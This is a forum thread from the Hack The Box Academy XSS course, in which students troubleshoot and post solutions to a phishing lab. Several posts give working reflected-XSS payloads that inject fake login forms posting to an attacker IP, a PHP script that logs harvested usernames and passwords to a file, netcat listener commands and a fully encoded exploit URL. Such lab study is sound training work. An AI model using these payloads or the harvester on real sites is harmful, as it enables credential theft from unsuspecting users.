Cross-Site Scripting (XSS) Module: "Issue in sending URL!" at the Phishing Section

HTB Content Academy
45

So I tried the phishing section for the XSS module without walking through most of the examples. Spent several hours trying to figure out why in the heck my payload worked locally(I could see username and password upon logging in), but NOT with ‘/send.php’.

For whatever reason, I did NOT put ‘name=“submit”’ for “input type=“submit”” in the payload. It makes sense why this works locally; the index.php script being used is looking for ‘username’ and ‘password’ fields via the isset() function. I’m pretty sure ‘/send.php’ is looking for “submit” as a conditional. I might be wrong about this, but it makes sense.

tldr: just copy the html form presented via the top of the page. Make sure each field, including the button, is named.

46

complete solution to this challenge - How to Exploit Reflected XSS: The "Surprising" Trick! - YouTube
hope it helps :))

1 Like
47

image
image958×347 12.7 KB

insert to XSS above to http://IP_target/phishing/index.php
and then get result URL

send to http://10.129.xx.xxx/phishing/send.php
before send go to cmd type
ncat -lvnp 8090
you will see user name password via cmd

5 Likes
48

im beyond annoyed with this section

49

I’m getting the same error. I am using http instead of https. Can you help me please?

50

I have it working and I also have the flag based on all the discussions on this forum.

Though there is one thing I do not understand.

When one runs XSStrike against the phishing/index.php one of the possible payloads is below.
'><DETaIls%09onPoinTerEnTEr%0d=%0d(confirm)()%0dx//

Let’s say I submit a parameter test the URL is:
http://10.129.193.135/phishing/index.php?url=test

The source then looks like below.

Based on the XSS payload we know that we need to start our XSS injection payload with '>

Then let’s submit ‘>test and the source looks like.
’>

to make this clearer let’s group this like below:
'>

So essentially by adding the '> as input we complete the img src tag.

So, I would think then in the final payload when doing the assignment one also would use the '>
But in all of these discussions all the sudden one needs to use '/>

Where does the / come from?
Why is the / needed?

Thanks

51

The forum application system removed the most important info.

Below is an image that shows the source when submitting test
image
http://10.129.193.135/phishing/index.php?url=test

Below is an image that shows the source when submitting '>test
image
http://10.129.193.135/phishing/index.php?url=>'test

So, in the solution, there the '> becomes '/>.
Whys is that?

52

My problem here was that i used proton vpn to access the website as soon as i turned it off i got the url sent.

53

thanks for the help!

54

It is foundamental that you write the HTML part as in the example. The placeholders have to be “Username” and “Password” otherwise the send.php page will not work. The names of the elements have to match as well… This was the problem on my side. Hope this helps.

55

Hi everyone

I’ve been hours with this question. I got on my nerves and my only problem was that I was using my VM with a VPN and not the Pwnbox. The only thing I changed was the IP and the port.

If anyone on the htb team is reading this please fix this issue.

56

I think this post has saved many comrades from gray hair!!) :slightly_smiling_face:
Thank you friend!!!
This is the best comment!

57

Yeah for anyone still attempting this, after about 4 hours of banging my head against the desk I finallly figured out that you HAVE to set the IP as your tun0 IP otherwise it WILL NOT WORK. You don’t have to do any extra encoding. Copying and pasting the url already encodes it. I attempted it a hundred different ways to no avail but the very first time I changed the IP to my tun0 it was instant success. Good luck

58

I faced this same issue as I was doing the module. What worked for me is using the Pwnbox that is provided by HTB.
There was no need to encode the url or parts of it. It just worked. Hope you find this helpful

59

Easiest way for me …

> //document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');//

```` edit the OUR_IP with your pwnbox tune0 ip , with port of your choice …paste the payload into your phishing/index.php , once the payload is successfully activated … mkdir /tmp/tmpserver… touch index.php , sudo nano index.php …paste this php…`

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>...

edit Server_IP with your pwnbox tune0 ip ... then sudo php -S 0.0.0.0: port you choose in your payload .....open new tab...http://target_Ip/phishing/send.php.... copy your index.php payload tab and paste it in send.php url input ..... figure the rest out

60

There are the following conditions to be met to solve this challenge:

  1. Do not use your own machine with VPN. Use the Pwnbox.
  2. Do not modify the /etc/hosts to add a custom domain (e.g., {ip_address} {domain}. Use the given IP address.
  3. You need to encode the malicious URL before using it in /phishing/send.php. You must NOT encode http://{pwnbox_ip}:{port} (Since 80 is being used, you need a different one, e.g., 8080).

In case you can’t still solve the challenge, refer to the encoded URL below

http://10.129.94.112/phishing/index.php?url=%2F%3E%3Cscript%3Edocument.write%28%27%3Ch3%3EPlease%20login%20to%20continue%3C%2Fh3%3E%3Cform%20action%3Dhttp://10.10.15.83:8080%3E%3Cinput%20type%3D%22username%22%20name%3D%22username%22%20placeholder%3D%22Username%22%3E%3Cinput%20type%3D%22password%22%20name%3D%22password%22%20placeholder%3D%22Password%22%3E%3Cinput%20type%3D%22submit%22%20name%3D%22submit%22%20value%3D%22Login%22%3E%3C%2Fform%3E%27%29%3B%20document.getElementById%28%27urlform%27%29.remove%28%29%3B%3C%2Fscript%3E%3C%21--
61

Guys, Friends,
I am at the last question of the Phishing section, but I don’t find it with some considerations made so far

image
image1323×236 33.3 KB


Access to http://10.129.x.x/phishing/ and use my payload, without conversion, just protected a double quotes. More easy and more clear for me.

' onerror='document.write("<form action=http://10.129.97.167/phishing/send.php><input type=\"username\" name=\"username\" placeholder=\"Username\"><input type=\"password\" name=\"password\" placeholder=\"Password\"><input type=\"submit\" name=\"submit\" value=\"Login\"></form>")

image
image1199×498 94.8 KB


Now, just write a username and password and click on Login.

image
image1186×354 74.5 KB

If we make a check with Burp we can see the encoded URL.

image
image1457×479 140 KB

image
image1461×469 123 KB


At this point, I can see what i believe is the final form. I need to break this, but I couldn’t find the right payload.

image
image1188×496 94 KB

try to put the image https://academy.hackthebox.com/images/logo-htb.svg and check the Header, It’s correct the path? Someone have found the correct payload?

image
image1464×589 123 KB

62

Solved!

1 Like
63

This is one of the most convoluted, f***ing exercises I’ve done as part of the path but alas, I solved it.

HOW TO SOLVE THIS S**TSHOW OF AN EXERCISE:

Note: Update IPs as needed - below, .236 is the exercise VM and .61 is my AttackBox IP.

  1. Go to http://10.129.9.236/phishing/index.php. Update the payload from lesson and tidy up syntax. Should look something like screenshot below. Remember to run a local listener nc -nvlp 8081 before filling out the form to confirm it’s working.
    Screenshot 2024-11-17 at 18.06.45
    Screenshot 2024-11-17 at 18.06.451254×416 214 KB
  2. Look at http://10.129.9.236/phishing/send.php and note the “I click on any link” wording. You want to feed in the whole http://10.129.9.236/phishing/index.php?url='%3E%3Cscript%3Edocument.write{{...}} payload here.
  3. Now compare and contrast the details from point 1 & 2 and the final /login.php endpoint. The devil is in the details here which f**cked me up for hours. If you look at http://10.129.9.236/phishing/login.php that the server thinks it’s logging into when your phishing email is sent, you’ll notice that the form value is **Login** instead of **Submit**. Update accordingly and the server should fill out your phishing form as expected.

You’re welcome,
Another annoyed user.

64

If anyone is struggling with removing urlform, you need to add '> characters at the beginning of documents.